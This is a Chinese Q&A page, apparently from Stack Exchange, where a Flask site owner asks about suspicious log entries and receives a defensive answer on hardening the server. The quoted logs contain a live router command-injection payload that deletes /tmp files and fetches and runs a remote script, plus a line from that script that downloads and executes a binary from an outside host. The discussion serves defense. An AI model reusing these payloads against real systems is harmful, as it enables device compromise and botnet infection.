You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

Flask应用出现异常连接,是否存在安全风险?

是否需要重新考虑网站托管方式?

我用Flask搭建了一个小型网站,用于帮助自己和朋友整理学习资料并方便访问。在连接记录中发现了以下异常请求:

185.224.128.191 - - [16/Jan/2024 16:00:56] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp;%20rm%20-rf%20*;%20wget%20http%3A%2F%2F104.168.5.4%2Ftenda.sh;%20chmod%20777%20tenda.sh;.%2Ftenda.sh) HTTP/1.1" 404 -

188.214.132.164 - - [16/Jan/2024 16:06:27] "CONNECT 84.32.188.22:602 HTTP/1.1" 404 -

查看tenda.sh文件后发现其中包含大量恶意操作,例如:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O "BADWORD" http://104.168.5.4/arm7; chmod +x "BADWORD"; ./BADWORD tplink

目前网站已下线,询问是否需要重新考虑托管方式。


回答

  1. 攻击未成功

    • 第一条请求是针对OpenWRT路由器LuCI管理界面的远程代码执行(RCE)扫描,你的Flask网站不存在/cgi-bin/luci路径,返回404说明攻击未触发。
    • 第二条CONNECT请求是典型的代理探测请求,同样因路径不匹配被拦截,无实际威胁。
  2. 无需立刻更换托管方式,但必须完成这些加固动作

    • 配置防火墙:仅放行网站所需端口(如80/443),若仅自己和固定朋友使用,直接设置IP白名单封禁其他所有访问。
    • 启用HTTPS:使用免费证书加密传输,避免明文泄露敏感信息。
    • 替换Flask开发服务器:改用Gunicorn+Nginx这类生产级部署方案,Flask自带的开发服务器不具备安全防护能力。
    • 监控与自动封禁:用fail2ban工具自动识别并封禁频繁扫描的恶意IP,定期检查访问日志。
    • 加强认证(若有登录功能):使用强密码+双因素认证,防止未授权访问。
  3. 关于恶意脚本tenda.sh
    该脚本的作用是遍历系统目录下载并执行ARM架构的恶意程序,大概率是挖矿木马或后门,但因你的网站无对应漏洞入口,无法触发执行,无需担心服务器已被感染。


内容的提问来源于stack exchange,提问作者Emil12232335

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.07.02 03:33:24